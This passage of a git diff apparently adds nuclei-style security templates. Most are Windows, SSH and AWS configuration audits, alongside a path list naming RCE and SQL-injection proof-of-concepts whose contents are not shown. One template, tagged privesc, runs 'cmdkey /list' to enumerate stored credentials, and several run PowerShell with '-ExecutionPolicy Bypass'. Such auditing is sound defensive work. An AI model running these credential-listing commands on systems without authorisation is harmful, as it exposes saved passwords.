./poc/other/sfd.yaml ./poc/other/sfos.yaml ./poc/other/sg-cachepress-01dd259dcab49f05580ac3bdd6414ced.yaml @@ -102543,6 +102749,7 @@ ./poc/other/show-hidecollapse-expand.yaml ./poc/other/show-posts-f6245da7518f9c1f311e5b92f64000b1.yaml ./poc/other/show-posts.yaml +./poc/other/show-version-warning.yaml ./poc/other/showbizpro-44831c2b287d25e0f0455d52b6d7b909.yaml ./poc/other/showbizpro.yaml ./poc/other/showdoc.yaml @@ -103619,6 +103826,7 @@ ./poc/other/sniplets-12a66d289f1d982a5410630994976bc7.yaml ./poc/other/sniplets-a33b18606f7c7c0e57e6c2973f66d288.yaml ./poc/other/sniplets.yaml +./poc/other/sns-public-subscribe-access.yaml ./poc/other/sns-topic-public-accessible.yaml ./poc/other/so-audible-25be1b113676ff29fdf97c563dea39b0.yaml ./poc/other/so-audible-400686882bda2d0b4d321441b1171f25.yaml @@ -104145,6 +104353,9 @@ ./poc/other/st-daily-tip.yaml ./poc/other/st_newsletter-06d1c7e09e9834aed347b62ce7221b3c.yaml ./poc/other/st_newsletter.yaml +./poc/other/stack-notification-disabled.yaml +./poc/other/stack-policy-not-inuse.yaml +./poc/other/stack-termination-disabled.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-290415cadef9c19a55802d0694d0c4ba.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-6e9e7493f4b83565fb4c7caa6bafc3ca.yaml ./poc/other/stackable-ultimate-gutenberg-blocks-ccca2f262821eaf2767551efac129b45.yaml @@ -104419,6 +104630,7 @@ ./poc/other/streaming_engine.yaml ./poc/other/streamlabs.yaml ./poc/other/streampipes.yaml +./poc/other/streamweasels-kick-integration-772ed0ffd8d710c91969af2e2067e767.yaml ./poc/other/streamweasels-twitch-integration-9c67b609f8fb8e89d8e70928bfcc57bf.yaml ./poc/other/streamweasels-twitch-integration-a2ec7a94d1bb55c0619cc15a585a4607.yaml ./poc/other/streamweasels-twitch-integration-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -104426,6 +104638,7 @@ ./poc/other/streamweasels-twitch-integration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/streamweasels-twitch-integration-plugin.yaml ./poc/other/streamweasels-twitch-integration.yaml +./poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml ./poc/other/strict-transport-security.yaml ./poc/other/stridercd-panel.yaml ./poc/other/striking-r-326c8bdf105c72fe7da4201f851de1ed.yaml @@ -105231,6 +105444,7 @@ ./poc/other/tencentcloud-cos-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tencentcloud-cos-plugin.yaml ./poc/other/tencentcloud-cos.yaml +./poc/other/tenda-fh451-stack-overflow.yaml ./poc/other/tenda-leakage.yaml ./poc/other/tenda-panel.yaml ./poc/other/tengweioa.yaml @@ -106385,6 +106599,7 @@ ./poc/other/tx-onepager.yaml ./poc/other/txt-fingerprint-10863.yaml ./poc/other/txt-fingerprint.yaml +./poc/other/txt.yaml ./poc/other/typebot-29c237607aa8d82c64f2f64dee2b3cb5.yaml ./poc/other/typebot-d46f8d409dfd4cf2ebe7a24205b8fb3e.yaml ./poc/other/typebot.yaml @@ -107030,6 +107245,7 @@ ./poc/other/unnamed.yaml ./poc/other/unomi.yaml ./poc/other/unprotected-broadcast.yaml +./poc/other/unquoted-service-pathcheck.yaml ./poc/other/unrestricted-admin-ports.yaml ./poc/other/unrestricted-sg-ingress-dns-port.yaml ./poc/other/unrestricted-sg-ingress-rdp-port.yaml @@ -107039,6 +107255,7 @@ ./poc/other/unsafe-inline-check.yaml ./poc/other/unseen-blog-5a4a9c89ee218494ff46b45947b7f600.yaml ./poc/other/unseen-blog.yaml +./poc/other/unsigned.yaml ./poc/other/unsplash.yaml ./poc/other/untangle-admin-setup.yaml ./poc/other/untappd.yaml @@ -111908,6 +112125,7 @@ ./poc/remote_code_execution/customize-my-account-for-woocommerce-c3e32bfa33102ab45cd2008574a6e8e9.yaml ./poc/remote_code_execution/customize-my-account-for-woocommerce.yaml ./poc/remote_code_execution/cve_rce2-1(1).yaml +./poc/remote_code_execution/cyberpanel-rce.yaml ./poc/remote_code_execution/dahua-dss-zhihuixiaoyuan-s2_45-rce.yaml ./poc/remote_code_execution/dahua-eims-capture-handle-rce.yaml ./poc/remote_code_execution/dahua-icc-fastjson-rce.yaml @@ -118348,7 +118566,11 @@ ./poc/sql/CVE-2024-0972-d643db18054b1dd86be768803ada8c1e.yaml ./poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml ./poc/sql/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml +./poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml +./poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml +./poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml ./poc/sql/CVE-2024-10343-4b62a3038a6fc336914f3ddb9e620492.yaml +./poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml ./poc/sql/CVE-2024-10402-d19daccb93672a4dbbaf6e7359c6a5a0.yaml ./poc/sql/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml ./poc/sql/CVE-2024-1047-68db58e698228b42f923e1452fb395bc.yaml @@ -118987,6 +119209,7 @@ ./poc/sql/CVE-2024-7859-c5c070dc8273cbfedbc9600c73cd97ad.yaml ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml ./poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml +./poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml ./poc/sql/CVE-2024-8104-ce7e2be47ca5e025bb553db2616e0460.yaml ./poc/sql/CVE-2024-8107-9941ef9f12828b3aa10278ae412dbb8d.yaml @@ -119031,7 +119254,9 @@ ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml ./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml +./poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml +./poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml ./poc/sql/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml @@ -119963,6 +120188,7 @@ ./poc/sql/cf7-styler-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/cf7-styler-for-divi-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/cf7-summary-and-print-1e30da773d5bdb41f0a7df4f71929e10.yaml +./poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml ./poc/sql/cf7-zoho-2e1ea1c47ee2f1626d1949d9ddbd12f4.yaml ./poc/sql/cforms-c00364338071c029d11801e6d6d843db.yaml ./poc/sql/cforms2-db9b68f1ee2b9be12c99bce089f4636b.yaml @@ -121755,6 +121981,7 @@ ./poc/sql/motors-car-dealership-classified-listings-fd851a2259dbf2f2b432d6ab6e9ea4b7.yaml ./poc/sql/move-addons-1167b2db2baf9e94dd4a44b571b981f5.yaml ./poc/sql/move-addons-8fc0bccfb14c6d1787dbecb39830ce5d.yaml +./poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml ./poc/sql/moveto-154cdc35f396e8fc20508edb7d0555dc.yaml ./poc/sql/mp-timetable-c7a9ef628b1154c47dbf0b3fd366d29d.yaml ./poc/sql/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml @@ -122446,6 +122673,7 @@ ./poc/sql/royal-elementor-addons-7b9095dbb3bfc8278a3c330ef98ba798.yaml ./poc/sql/royal-elementor-addons-89f1bb61464e1dbfe60d2e3cb04465f0.yaml ./poc/sql/royal-elementor-addons-97b685b9e6a886b570db7f62e08ed1d5.yaml +./poc/sql/royal-event-management-system-sqli.yaml ./poc/sql/rss-feed-post-generator-echo-b13d377a9dbca142b213f79ffe472808.yaml ./poc/sql/rss-import-e77e3db079e6a03ccc6f7e08b07dc4a1.yaml ./poc/sql/rss-includes-pages-65db39b697a6c06037fb6e4114879974.yaml @@ -124194,6 +124422,7 @@ ./poc/sql/xdcms-sqli-11667.yaml ./poc/sql/xdcms-sqli.yaml ./poc/sql/xhanch-my-twitter-13afd7959bdba431246ec18eac06eb55.yaml +./poc/sql/xhibiter-nft-sqli.yaml ./poc/sql/xo-event-calendar-4141db509b6d506a88a5f846b22304e8.yaml ./poc/sql/xray-clandbeta.yaml ./poc/sql/xserver-migrator-0ba803f5ae9bddb872117dcecb6a9fcd.yaml @@ -125035,6 +125264,7 @@ ./poc/sql_injection/realor_index_agent_getapp_sqli.yaml ./poc/sql_injection/realor_index_dologin_sqli.yaml ./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml +./poc/sql_injection/royal-event-management-system-sqli.yaml ./poc/sql_injection/run_id_SQL.yaml ./poc/sql_injection/seaCMS-sqli.yaml ./poc/sql_injection/seacms-dmku-sqli.yaml @@ -125269,6 +125499,7 @@ ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml ./poc/sql_injection/xdcms-sqli.yaml +./poc/sql_injection/xhibiter-nft-sqli.yaml ./poc/sql_injection/xunrui-cms-sqli.yaml ./poc/sql_injection/yapi-sql-inject.yaml ./poc/sql_injection/yeswiki-sql.yaml @@ -125370,7 +125601,12 @@ ./poc/ssh/cowrie-ssh-honeypot-detect.yaml ./poc/ssh/cowrie-ssh-honeypot-detection.yaml ./poc/ssh/deprecated-sshv1-detection.yaml +./poc/ssh/disable-ssh-forwarding.yaml +./poc/ssh/disable-ssh-protocol-1.yaml +./poc/ssh/enable-ssh-privilege-separation.yaml ./poc/ssh/iam-ssh-keys-rotation.yaml +./poc/ssh/limit-ssh-group.yaml +./poc/ssh/limit-ssh-users-access.yaml ./poc/ssh/obsolete-ssh-version.yaml ./poc/ssh/openssh-detect.yaml ./poc/ssh/openssh-detect.yml @@ -125380,6 +125616,7 @@ ./poc/ssh/openssh-username-enumeration.yaml ./poc/ssh/openssh5.3-detect.yaml ./poc/ssh/rsshub-detect.yaml +./poc/ssh/ssh-audit.yaml ./poc/ssh/ssh-auth-methods.yaml ./poc/ssh/ssh-authorized-keys-1.yaml ./poc/ssh/ssh-authorized-keys-10523.yaml @@ -125389,6 +125626,8 @@ ./poc/ssh/ssh-cbc-mode-ciphers.yaml ./poc/ssh/ssh-default-logins.yaml ./poc/ssh/ssh-diffie-hellman-logjam.yaml +./poc/ssh/ssh-ip-whitelist.yaml +./poc/ssh/ssh-key-auth-required.yaml ./poc/ssh/ssh-known-hosts-1.yaml ./poc/ssh/ssh-known-hosts-10524.yaml ./poc/ssh/ssh-known-hosts-2.yaml @@ -128008,6 +128247,7 @@ ./poc/web/webtrees-install.yaml ./poc/web/webtrust-cert.yaml ./poc/web/webui-aria2.yaml +./poc/web/webui-login.yaml ./poc/web/webui-rce-11170.yaml ./poc/web/webui-rce-11171.yaml ./poc/web/webui-rce-11172.yaml @@ -135427,6 +135667,8 @@ ./poc/wordpress/wpc-composite-products.yaml ./poc/wordpress/wpc-grouped-product-4128a97ef233a24550e743d03196f561.yaml ./poc/wordpress/wpc-grouped-product.yaml +./poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml +./poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml ./poc/wordpress/wpcal-1e492620e8a7e81b2eec48aa4fd7a9b8.yaml ./poc/wordpress/wpcal.yaml ./poc/wordpress/wpcalc-74489dc147c707bfca57f928245a54c8.yaml diff --git a/poc/auth/credential-guard-disabled.yaml b/poc/auth/credential-guard-disabled.yaml new file mode 100644 index 0000000000..c0ba03763e --- /dev/null +++ b/poc/auth/credential-guard-disabled.yaml @@ -0,0 +1,38 @@ +id: credential-guard-disabled + +info: + name: Credential Guard Not Enabled + author: princechaddha + severity: high + description: Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft. + impact: | + Disabling Credential Guard reduces protection against modern credential theft techniques. + remediation: | + Enable Credential Guard to enhance security against credential theft. + tags: credential-guard,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard + + matchers-condition: and + matchers: + - type: word + words: + - "AvailableSecurityProperties" + + - type: word + words: + - "Credential Guard" + negative: true diff --git a/poc/auth/disable-empty-password.yaml b/poc/auth/disable-empty-password.yaml new file mode 100644 index 0000000000..fd2531db63 --- /dev/null +++ b/poc/auth/disable-empty-password.yaml @@ -0,0 +1,24 @@ +id: disable-empty-password + +info: + name: Disable SSH Empty Password + author: pussycat0x + severity: info + description: | + Disabling SSH logins with empty passwords significantly enhances the security of your server. + remediation: | + Change it to : PermitEmptyPasswords no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://docs.datadoghq.com/security/default_rules/xccdf-org-ssgproject-content-rule-sshd-disable-empty-passwords/ + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "PermitEmptyPasswords no" + negative: true \ No newline at end of file diff --git a/poc/auth/disable-root-login.yaml b/poc/auth/disable-root-login.yaml new file mode 100644 index 0000000000..071b31c1f4 --- /dev/null +++ b/poc/auth/disable-root-login.yaml @@ -0,0 +1,23 @@ +id: disable-root-login + +info: + name: Disable SSH Root Login + author: pussycat0x + severity: info + description: | + Disabling direct root login can help prevent unauthorized users from gaining full control over your system. + remediation: | + Change it to : PermitRootLogin no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.tecmint.com/disable-or-enable-ssh-root-login-and-limit-ssh-access-in-linux/ + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "PermitRootLogin yes" \ No newline at end of file diff --git a/poc/auth/get-stored-credentials-cmdkey.yaml b/poc/auth/get-stored-credentials-cmdkey.yaml new file mode 100644 index 0000000000..add3f79a1e --- /dev/null +++ b/poc/auth/get-stored-credentials-cmdkey.yaml @@ -0,0 +1,27 @@ +id: get-stored-credentials-cmdkey + +info: + name: Get Stored Credentials - cmdkey + author: pussycat0x + severity: high + description: | + The cmdkey /list command in Windows is used to list all the stored credentials on the system. These credentials can include saved usernames and passwords for network resources, websites, or remote computers + tags: code,windows,privesc,ps + +self-contained: true +code: + - engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + - -File + pattern: "*.ps1" + source: | + cmdkey /list + + extractors: + - type: dsl + dsl: + - response diff --git a/poc/auth/hide-last-login-information.yaml b/poc/auth/hide-last-login-information.yaml new file mode 100644 index 0000000000..49a07c2a0b --- /dev/null +++ b/poc/auth/hide-last-login-information.yaml @@ -0,0 +1,24 @@ +id: hide-last-login-information + +info: + name: Hide SSH Last Login Information + author: pussycat0x + severity: info + description: | + Reduces Information Exposure: Users will no longer see the last login details when they log in, enhancing privacy. + remediation: | + Ensure the following line is present: : PrintLastLog no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209441 + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "PrintLastLog no" + negative: true \ No newline at end of file diff --git a/poc/auth/http-preprocessor.yaml b/poc/auth/http-preprocessor.yaml new file mode 100644 index 0000000000..795e86150b --- /dev/null +++ b/poc/auth/http-preprocessor.yaml @@ -0,0 +1,17 @@ +id: http-preprocessor + +info: + name: Test Http Preprocessor + author: pdteam + severity: info + +http: + - raw: + - | + GET /?test={{randstr}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/hyperv-enhanced-session-mode-enabled.yaml b/poc/auth/hyperv-enhanced-session-mode-enabled.yaml new file mode 100644 index 0000000000..7159e65ecb --- /dev/null +++ b/poc/auth/hyperv-enhanced-session-mode-enabled.yaml @@ -0,0 +1,33 @@ +id: hyperv-enhanced-session-mode-enabled + +info: + name: Hyper-V Enhanced Session Mode Enabled + author: princechaddha + severity: medium + description: Determines if Hyper-V Enhanced Session Mode is enabled unnecessarily. + impact: | + Enabling Enhanced Session Mode unnecessarily can expose the virtual machine to additional risks by increasing attack surface. + remediation: | + Disable Enhanced Session Mode if not required. + tags: windows,hyperv,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $enhancedSession = Get-VMHost | Select-Object -ExpandProperty EnhancedSessionTransportType + Write-Host "EnhancedSessionMode: $enhancedSession" + + matchers: + - type: word + words: + - "EnhancedSessionMode: VMBus" diff --git a/poc/auth/limit-maximum-authentication-attempts.yaml b/poc/auth/limit-maximum-authentication-attempts.yaml new file mode 100644 index 0000000000..b3b2546e8b --- /dev/null +++ b/poc/auth/limit-maximum-authentication-attempts.yaml @@ -0,0 +1,23 @@ +id: limit-maximum-authentication-attempts + +info: + name: Limit Maximum SSH Authentication Attempts + author: pussycat0x + severity: info + description: | + Reduces Brute-Force Attack Surface: Limiting the number of attempts prevents attackers from repeatedly guessing passwords. + remediation: | + Change it to : MaxAuthTries 3 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.tenable.com/audits/items/CIS_Amazon_Linux_2_v3.0.0_L1.audit:82ddb0bcc7ddfddaae3ec0b408ffb225 + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "#MaxAuthTries" \ No newline at end of file diff --git a/poc/auth/lm-ntlmv1-authentication-enabled.yaml b/poc/auth/lm-ntlmv1-authentication-enabled.yaml new file mode 100644 index 0000000000..1307ff37e5 --- /dev/null +++ b/poc/auth/lm-ntlmv1-authentication-enabled.yaml @@ -0,0 +1,32 @@ +id: lm-ntlmv1-authentication-enabled + +info: + name: LM and NTLMv1 Authentication Enabled + author: princechaddha + severity: high + description: Checks if LM and NTLMv1 authentication protocols are enabled, which are insecure. + impact: | + Legacy authentication methods such as LM and NTLMv1 are vulnerable to brute-force and pass-the-hash attacks. + remediation: | + Disable LM and NTLMv1 and enforce NTLMv2 or Kerberos for secure authentication. + tags: lm,ntlmv1,authentication,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $level = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LmCompatibilityLevel' -ErrorAction SilentlyContinue).LmCompatibilityLevel; if ($level -lt 3 -or $level -eq $null) { if ($level -eq $null) {"LM Compatibility Level is not set"} else {"LM Compatibility Level is misconfigured (current value: $level)"}} else {"LM Compatibility Level is securely configured (current value: $level)"} + + matchers: + - type: word + words: + - "LM Compatibility Level is misconfigured" diff --git a/poc/auth/max-password-age-too-high.yaml b/poc/auth/max-password-age-too-high.yaml new file mode 100644 index 0000000000..fe14caa08e --- /dev/null +++ b/poc/auth/max-password-age-too-high.yaml @@ -0,0 +1,30 @@ +id: max-password-age-too-high + +info: + name: Maximum Password Age Set Too High or Unlimited + author: princechaddha + severity: medium + description: Checks if the maximum password age allows passwords to be used indefinitely. + impact: | + Allowing long or unlimited password lifetimes increases the risk of compromised credentials. + remediation: | + Set a reasonable maximum password age to force regular password changes. + tags: policy,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - cmd + args: + - /c + pattern: "*.cmd" + source: | + net accounts + + matchers: + - type: word + words: + - "Maximum password age (days): 0" \ No newline at end of file diff --git a/poc/auth/minimum-password-age-zero.yaml b/poc/auth/minimum-password-age-zero.yaml new file mode 100644 index 0000000000..27f45aab90 --- /dev/null +++ b/poc/auth/minimum-password-age-zero.yaml @@ -0,0 +1,36 @@ +id: minimum-password-age-zero + +info: + name: Minimum Password Age Set to Zero + author: princechaddha + severity: medium + description: Checks if the minimum password age is set to zero, allowing immediate password changes and potential reuse. + impact: | + Allowing a password age of zero may lead to the rapid reuse of weak passwords, reducing account security. + remediation: | + Set a reasonable minimum password age to prevent users from reusing old passwords frequently. + tags: windows, password, policy, code, windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - cmd + args: + - /c + pattern: "*.cmd" + source: | + net accounts + + matchers-condition: and + matchers: + - type: word + words: + - "Minimum password age (days): 0" + negative: true + + - type: word + words: + - "Minimum password age" \ No newline at end of file diff --git a/poc/auth/null-session-allowed.yaml b/poc/auth/null-session-allowed.yaml new file mode 100644 index 0000000000..9fed414ca4 --- /dev/null +++ b/poc/auth/null-session-allowed.yaml @@ -0,0 +1,32 @@ +id: null-session-allowed + +info: + name: Null Session Allowed + author: princechaddha + severity: high + description: Checks if null sessions are allowed via any entry in the NullSessionPipes registry key, posing a security risk. + impact: | + Allowing null sessions can lead to unauthorized access to network resources, increasing vulnerability to attacks. + remediation: | + Disable null sessions by ensuring no entries are allowed in the NullSessionPipes registry key. + tags: windows,null-session,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name 'NullSessionPipes').NullSessionPipes.Count -gt 0) { "Null sessions are allowed" } + + matchers: + - type: word + words: + - "Null sessions are allowed" \ No newline at end of file diff --git a/poc/auth/password-complexity-disabled.yaml b/poc/auth/password-complexity-disabled.yaml new file mode 100644 index 0000000000..0e9ba83367 --- /dev/null +++ b/poc/auth/password-complexity-disabled.yaml @@ -0,0 +1,32 @@ +id: password-complexity-disabled + +info: + name: Password Complexity Requirements Disabled + author: princechaddha + severity: high + description: Checks if password complexity requirements are disabled. + impact: | + Disabling password complexity can lead to the use of weak, easily guessable passwords, increasing the risk of unauthorized access. + remediation: | + Enable password complexity requirements to enforce the use of strong, hard-to-guess passwords. + tags: windows,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LimitBlankPasswordUse').LimitBlankPasswordUse -eq 0) { "Password complexity is disabled" } + + matchers: + - type: word + words: + - "Password complexity is disabled" diff --git a/poc/auth/password-history-size-low.yaml b/poc/auth/password-history-size-low.yaml new file mode 100644 index 0000000000..b45d8de928 --- /dev/null +++ b/poc/auth/password-history-size-low.yaml @@ -0,0 +1,32 @@ +id: password-history-size-low + +info: + name: Password History Size Too Low + author: princechaddha + severity: medium + description: Checks if the password history count is too low or not configured, allowing password reuse. + impact: | + A low or unset password history setting may allow users to reuse recently used passwords, increasing the risk of password compromise. + remediation: | + Increase the password history count to at least 24 previous passwords to prevent rapid reuse of old passwords. + tags: password,history,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'PasswordHistorySize' -ErrorAction SilentlyContinue; if ($null -eq $policy.PasswordHistorySize -or $policy.PasswordHistorySize -lt 24) { "Password history size is too low or not configured." } + + matchers: + - type: word + words: + - "Password history size is too low or not configured." \ No newline at end of file diff --git a/poc/auth/password-reset-lock-screen-enabled.yaml b/poc/auth/password-reset-lock-screen-enabled.yaml new file mode 100644 index 0000000000..5efb96047f --- /dev/null +++ b/poc/auth/password-reset-lock-screen-enabled.yaml @@ -0,0 +1,32 @@ +id: password-reset-lock-screen-enabled + +info: + name: Password Reset from Lock Screen Enabled + author: princechaddha + severity: medium + description: Checks if password reset options are available on the lock screen, which can lead to unauthorized access. + impact: | + Allowing password resets from the lock screen could permit attackers to reset passwords without authorization. + remediation: | + Disable password reset options on the lock screen. + tags: password,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if ((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' -Name 'DisablePasswordReset' -ErrorAction SilentlyContinue).DisablePasswordReset -eq 0) { "Password reset from lock screen is enabled." } + + matchers: + - type: word + words: + - "Password reset from lock screen is enabled." diff --git a/poc/auth/plaintext-passwords-in-memory.yaml b/poc/auth/plaintext-passwords-in-memory.yaml new file mode 100644 index 0000000000..f7fadfd253 --- /dev/null +++ b/poc/auth/plaintext-passwords-in-memory.yaml @@ -0,0 +1,32 @@ +id: plaintext-passwords-in-memory + +info: + name: Plaintext Passwords Stored in Memory + author: princechaddha + severity: high + description: Checks if passwords are stored in memory in plaintext, potentially exposing sensitive information to unauthorized memory access. + impact: | + Storing passwords in plaintext in memory can expose sensitive credentials to attackers who gain access to memory dumps or can read memory directly, leading to unauthorized access and data breaches. + remediation: | + Ensure that all sensitive data, especially passwords, are stored in memory in an encrypted or hashed format to mitigate the risk of exposure. + tags: windows,security,credentials,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -ErrorAction SilentlyContinue).UseLogonCredential -eq 1) { "Plaintext passwords are stored in memory." } + + matchers: + - type: word + words: + - "Plaintext passwords are stored in memory." \ No newline at end of file diff --git a/poc/auth/secret-manager-inuse.yaml b/poc/auth/secret-manager-inuse.yaml new file mode 100644 index 0000000000..39be6483e7 --- /dev/null +++ b/poc/auth/secret-manager-inuse.yaml @@ -0,0 +1,38 @@ +id: secret-manager-inuse + +info: + name: Secret Manager In Use + author: DhiyaneshDK + severity: medium + description: | + Ensure that Amazon Secrets Manager service is used in your AWS account to manage access credentials (i.e. secrets) such as API keys, OAuth tokens and database credentials. + impact: | + AWS Secrets Manager improves security by securely managing and rotating sensitive credentials, reducing the risk of exposure and unauthorized access. + remediation: | + Ensure AWS Secrets Manager is used to securely store, manage, and rotate sensitive credentials such as API keys, database passwords, and tokens, and remove hard-coded secrets from applications. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/secrets-manager-in-use.html + - https://docs.aws.amazon.com/secretsmanager/latest/userguide/intro.html + tags: cloud,devops,aws,amazon,secret-manager,aws-cloud-config + +variables: + region: "us-west-2" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json + + matchers: + - type: word + words: + - '[]' + negative: true + + extractors: + - type: dsl + dsl: + - '"Secrets Manager In Use in " + region + " AWS region"' \ No newline at end of file diff --git a/poc/auth/secret-rotation-enabled.yaml b/poc/auth/secret-rotation-enabled.yaml new file mode 100644 index 0000000000..69fc835560 --- /dev/null +++ b/poc/auth/secret-rotation-enabled.yaml @@ -0,0 +1,58 @@ +id: secrets-rotation-enabled + +info: + name: Secret Rotation Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that AWS Secrets Manager service is configured to automatically rotate your service or database secrets (i.e. enable automatic rotation feature for your secrets). + impact: | + Secret rotation disabled in AWS increases the risk of credential compromise and prolonged unauthorized access due to outdated or exposed secrets. + remediation: | + Enable automatic secret rotation in AWS Secrets Manager by configuring a rotation schedule and associating a Lambda function to periodically update and securely rotate the secrets. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/rotation-enabled.html + - https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/rotate-secret.html + tags: cloud,devops,aws,amazon,secrets-manager,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let SecretListName of iterate(template.secrets)){ + set("secretlist", SecretListName) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json + + extractors: + - type: json + name: secrets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws secretsmanager describe-secret --region $region --secret-id $secretlist --query 'RotationEnabled' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"Secrets Rotation " + secretlist + " is disabled"' \ No newline at end of file diff --git a/poc/auth/secret-rotation-interval.yaml b/poc/auth/secret-rotation-interval.yaml new file mode 100644 index 0000000000..28364043d5 --- /dev/null +++ b/poc/auth/secret-rotation-interval.yaml @@ -0,0 +1,58 @@ +id: secret-rotation-interval + +info: + name: Secret Rotation Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that the rotation interval for your AWS Secrets Manager secrets is configured to meet security and compliance requirements. + impact: | + Disabling secret rotation intervals increases the risk of long-term exposure to compromised credentials, making the system vulnerable to unauthorized access. + remediation: | + Enable automatic secret 